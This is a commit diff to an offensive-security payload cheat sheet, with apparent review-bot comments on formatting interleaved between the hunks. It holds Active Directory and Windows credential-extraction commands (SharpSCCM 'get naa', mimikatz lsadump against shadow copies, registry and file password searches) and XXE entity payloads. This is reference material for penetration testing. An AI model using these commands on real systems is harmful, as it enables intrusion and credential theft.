mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-04-25 14:55:09 +02:00

XXS Public Example + PHP Filter RCE

This commit is contained in:
parent 35ff178624
commit fe41254fde

File diff suppressed because one or more lines are too long
@ -3663,9 +3663,10 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
```
* Using [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) for SCCM retrieval and decryption
* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) or [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
```ps1
.\SharpDPAPI.exe SCCM
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
```
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
```ps1
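Review bot: the added `.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD` line leaves its placeholders unexplained, while the `.\SharpDPAPI.exe SCCM` line beside it takes no arguments; the bullet should say which account's credentials `USERNAME`/`PASSWORD` stand for so readers do not treat the two commands as interchangeable. The `Mayyhem/SharpSCCM` link also points at the repository root, whereas the SharpDPAPI link is pinned to a commit and line range; link the `get naa` documentation or pin a commit so the command syntax stays verifiable.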
@ -4048,4 +4049,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
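Review bot: the `* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev ...]` reference appears twice in this hunk with identical visible text, which looks like a line removed and re-added with only a whitespace difference; either revert that line or confirm it is intentional, so the hunk stays limited to the new Diamond and Sapphire ticket references.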
@ -41,6 +41,8 @@
gitrob analyze johndoe --site=https://github.acme.com --endpoint=https://github.acme.com/api/v3 --access-tokens=token1,token2
```

* Perform Google Dorks search


## Active recon

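Review bot: the new `* Perform Google Dorks search` bullet is bare, while the item above it gives a concrete command (`gitrob analyze ...`); add a link or an example query so the step is actionable. Also check the two blank lines left before `## Active recon`, since the other headings in this file are separated by a single blank line.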
@ -74,7 +76,7 @@

### Web discovery

* Locate `robots.txt` file
* Locate `robots.txt`, `security.txt`, `sitemap.xml` files
* Retrieve comments in source code
* Discover URL: [tomnomnom/waybackurls](github.com/tomnomnom/waybackurls)
* Search for `hidden` parameters: [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner)
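Review bot: while this list is being touched, the `waybackurls` link lacks a scheme (`github.com/tomnomnom/waybackurls` renders as a relative link, unlike the `https://github.com/...` link on the next line) and `Discover URL` should read `Discover URLs`. The expanded `robots.txt`, `security.txt`, `sitemap.xml` bullet itself is fine.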
@ -109,7 +111,10 @@

## Looking for Web vulnerabilities

* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, ....
* Explore the website and look for vulnerabilities listed in this repository: SQL injection, XSS, CRLF, Cookies, ....
* Test for Business Logic weaknesses
* High or negative numerical values
* Try all the features and click all the buttons
* [The Web Application Hacker's Handbook Checklist](https://gist.github.com/gbedoya/10935137) copied from http://mdsec.net/wahh/tasks.html

* Subscribe to the site and pay for the additional functionality to test
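Review bot: the new `* Subscribe to the site and pay for the additional functionality to test` bullet is separated from the list above by a blank line, so Markdown renders it as a second, detached list; move it directly under `* Try all the features and click all the buttons`. The trailing `CRLF, Cookies, ....` (four dots) should be `etc.` or a normal ellipsis.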
@ -14,8 +14,8 @@
* [Default Writeable Folders](#default-writeable-folders)
* [EoP - Looting for passwords](#eop---looting-for-passwords)
* [SAM and SYSTEM files](#sam-and-system-files)
* [LAPS Settings](#laps-settings)
* [HiveNightmare](#hivenightmare)
* [LAPS Settings](#laps-settings)
* [Search for file contents](#search-for-file-contents)
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
@ -405,15 +405,6 @@ samdump2 SYSTEM SAM -o sam.txt

Either crack it with `john -format=NT /root/sam.txt`, [hashcat](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md#hashcat) or use Pass-The-Hash.

### LAPS Settings

Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.

* LAPS Enabled: AdmPwdEnabled
* LAPS Admin Account Name: AdminAccountName
* LAPS Password Complexity: PasswordComplexity
* LAPS Password Length: PasswordLength
* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled

### HiveNightmare

@ -443,6 +434,16 @@ mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\W
mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
```

### LAPS Settings

Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.

* LAPS Enabled: AdmPwdEnabled
* LAPS Admin Account Name: AdminAccountName
* LAPS Password Complexity: PasswordComplexity
* LAPS Password Length: PasswordLength
* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled


### Search for file contents

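Review bot: the relocated `### LAPS Settings` section ends with two blank lines before `### Search for file contents`; drop one. The section also only says to extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` without giving a command, whereas the neighbouring sections do; a `reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd"` line in a ```powershell fence, matching the `reg query` examples used later in this file, would keep it consistent. It is worth one sentence that the listed values (`AdmPwdEnabled`, `PasswordLength`, `PwdExpirationProtectionEnabled`, ...) describe the LAPS policy applied to the host, not the managed local administrator password itself, so readers know what this step does and does not yield.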
@ -452,6 +453,10 @@ findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
```

Also search in remote places such as SMB Shares and SharePoint.
* Search passwords in SharePoint: [nheiniger/SnaffPoint](https://github.com/nheiniger/SnaffPoint)
* Search passwords in SMB Shares: [SnaffCon/Snaffler](https://github.com/SnaffCon/Snaffler)

### Search for a file with a certain filename

```powershell
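Review bot: `Also search in remote places such as SMB Shares and SharePoint.` runs straight into the `* Search passwords in SharePoint` bullet with no blank line between them, which some Markdown renderers fold into the paragraph; insert a blank line before the list. `remote places` reads better as `remote locations`.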
@ -477,12 +482,6 @@ reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### Read a value of a certain sub key

```powershell
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
```

### Passwords in unattend.xml

Location of the unattend.xml files.
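Review bot: confirm that dropping the `### Read a value of a certain sub key` section, together with its `REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList` example, is intended, since the commit message only mentions the PUBLIC entity example and the PHP filter RCE; if it is, check that no table-of-contents entry still points at `#read-a-value-of-a-certain-sub-key`.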
@ -139,11 +139,9 @@ We try to display the content of the file `/etc/passwd`

:warning: `SYSTEM` and `PUBLIC` are almost synonym.

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
```ps1
<!ENTITY % xxe PUBLIC "Random Text" "URL">
<!ENTITY xxe PUBLIC "Any TEXT" "URL">
```

### Classic XXE Base64 encoded

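Review bot: the new `<!ENTITY ... PUBLIC ...>` examples are fenced as ```ps1 although they are DTD declarations; use ```xml as the block above does. `almost synonym` should read `almost synonymous`, and the warning would be clearer with one sentence explaining why: in a PUBLIC external identifier the first literal (`"Random Text"`, `"Any TEXT"`) is a public identifier that parsers ignore unless a catalog maps it, and the second literal is the system identifier that is actually resolved, exactly as with `SYSTEM`, so a parser that resolves external entities behaves the same for both forms and the mitigation (disabling external entity resolution) is the same.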